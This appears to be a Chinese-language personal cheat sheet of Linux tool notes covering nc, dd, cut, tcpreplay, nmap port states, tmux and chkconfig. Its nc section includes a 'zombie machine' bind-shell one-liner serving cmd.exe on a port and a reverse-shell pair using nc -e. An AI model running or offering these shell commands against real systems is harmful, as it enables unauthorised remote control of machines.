nc
https://www.cnblogs.com/littlex/archive/2012/12/13/2816968.html
（1）实现任意TCP/UDP端口的侦听，nc可以作为server以TCP或UDP方式侦听指定端口
（2）端口的扫描，nc可以作为client发起TCP或UDP连接
（3）机器之间传输文件
（4）机器之间网络测速
1) -l
用于指定nc将处于侦听模式。指定该参数，则意味着nc被当作server，侦听并接受连接，而非向其它地址发起连接。
2) -p <port>
暂未用到（老版本的nc可能需要在端口号前加-p参数，下面测试环境是centos6.6，nc版本是nc-1.84，未用到-p参数）
3) -s
指定发送数据的源IP地址，适用于多网卡机
4) -u
 指定nc使用UDP协议，默认为TCP
5) -v
输出交互或出错信息，新手调试时尤为有用
6）-w
超时秒数，后面跟数字
7）-z
表示zero，表示扫描时不发送任何数据

-e；作用就是程序定向
-t：以telnet的形式来应答
-n：指定数字的IP地址

肉鸡命令
nc -l -p 5277 -t -e cmd.exe
反弹
local machine：nc -l -p port ( or nc -l -v -p port )
remote machine：nc -e cmd.exe ip port


==================================================================================================================================
dd：用指定大小的块拷贝一个文件，并在拷贝的同时进行指定的转换。
参数注释：

if=文件名：输入文件名，缺省为标准输入。即指定源文件。< if=input file >
of=文件名：输出文件名，缺省为标准输出。即指定目的文件。< of=output file >
ibs=bytes：一次读入bytes个字节，即指定一个块大小为bytes个字节。
obs=bytes：一次输出bytes个字节，即指定一个块大小为bytes个字节。
bs=bytes：同时设置读入/输出的块大小为bytes个字节。
cbs=bytes：一次转换bytes个字节，即指定转换缓冲区大小。
skip=blocks：从输入文件开头跳过blocks个块后再开始复制。
seek=blocks：从输出文件开头跳过blocks个块后再开始复制。
注意：通常只用当输出文件是磁盘或磁带时才有效，即备份到磁盘或磁带时才有效。
count=blocks：仅拷贝blocks个块，块大小等于ibs指定的字节数。
conv=conversion：用指定的参数转换文件。
ascii：转换ebcdic为ascii
ebcdic：转换ascii为ebcdic
ibm：转换ascii为alternate ebcdic
block：把每一行转换为长度为cbs，不足部分用空格填充
unblock：使每一行的长度都为cbs，不足部分用空格填充
lcase：把大写字符转换为小写字符
ucase：把小写字符转换为大写字符
swab：交换输入的每对字节
noerror：出错时不停止
notrunc：不截短输出文件
sync：将每个输入块填充到ibs个字节，不足部分用空（NUL）字符补齐。

==================================================================================================================================
inetd shell 服务器  xinetd 安全变种
inetd.conf则是inetd的配置文件。 inetd.conf文件告诉inetd监听哪些网络端口，为每个端口启动哪个服务
/etc/inetd.conf
常用缩写词
DNS：域名系统
FTP：文件传输协议
HTTP：超文本传输协议
IMAP：因特网信息访问协议
POP：邮局协议
SMTP：简单邮件传输协议
TCP：传输控制协议
UDP：用户数据报协议

shell 实现的web服务
https://yq.aliyun.com/ziliao/120720
==================================================================================================================================

cut 分割输出数据
cut [-bn] [file] 或 cut [-c] [file] 或 cut [-df] [file]
主要参数
-b ：以字节为单位进行分割。这些字节位置将忽略多字节字符边界，除非也指定了 -n 标志。
-c ：以字符为单位进行分割。
-d ：自定义分隔符，默认为制表符。
-f ：与-d一起使用，指定显示哪个区域。
-n ：取消分割多字节字符。仅和 -b 标志一起使用。如果字符的最后一个字节落在由 -b 标志的 List

==================================================================================================================================

tcpreplay  tcpreplay是一种pcap包的重放工具
https://www.cnblogs.com/zlslch/p/7325599.html?utm_source=itdadao&utm_medium=referral

安装
yum install tcpreplay

tcpprep - multi-pass pcap file pre-processor which determines packets as client or server and creates cache files used by tcpreplay and tcprewrite
tcprewrite - pcap file editor which rewrites TCP/IP and Layer 2 packet headers
tcpreplay - replays pcap files at arbitrary speeds onto the network
tcpliveplay - Replays network traffic stored in a pcap file on live networks using new TCP connections
tcpreplay-edit - replays & edits pcap files at arbitrary speeds onto the network
tcpbridge - bridge two network segments with the power of tcprewrite
tcpcapinfo - raw pcap file decoder and debugger

==================================================================================================================================
linux 命令
https://www.cnblogs.com/gaojun/p/3359355.html

vi 操作命令
https://www.cnblogs.com/mondol/p/vi-examples.html

which     查看可执行文件的位置。
whereis 查看文件的位置。
locate  配合数据库查看文件位置。
find        实际搜寻硬盘查询文件名称。
==================================================================================================================================

nmap端口状态解析
yum install nmap
open ： 应用程序在该端口接收 TCP 连接或者 UDP 报文。
closed ：关闭的端口对于nmap也是可访问的， 它接收nmap探测报文并作出响应。但没有应用程序在其上监听。
filtered ：由于包过滤阻止探测报文到达端口，nmap无法确定该端口是否开放。过滤可能来自专业的防火墙设备，路由规则 或者主机上的软件防火墙。
unfiltered ：未被过滤状态意味着端口可访问，但是nmap无法确定它是开放还是关闭。 只有用于映射防火墙规则集的 ACK 扫描才会把端口分类到这个状态。
open | filtered ：无法确定端口是开放还是被过滤， 开放的端口不响应就是一个例子。没有响应也可能意味着报文过滤器丢弃了探测报文或者它引发的任何反应。UDP，IP协议,FIN, Null 等扫描会引起。
closed|filtered：（关闭或者被过滤的）：无法确定端口是关闭的还是被过滤的

==================================================================================================================================
tmux 分屏显示工具
yum install tmux -y

==================================================================================================================================
chkconfig命令主要用来更新（启动或停止）和查询系统服务的运行级信息
chkconfig [--add][--del][--list][系统服务] 或 chkconfig [--level <等级代号>][系统服务][on/off/reset]

==================================================================================================================================

cloc perl 语言统计各个代码行数的工具
yum install cloc

==================================================================================================================================

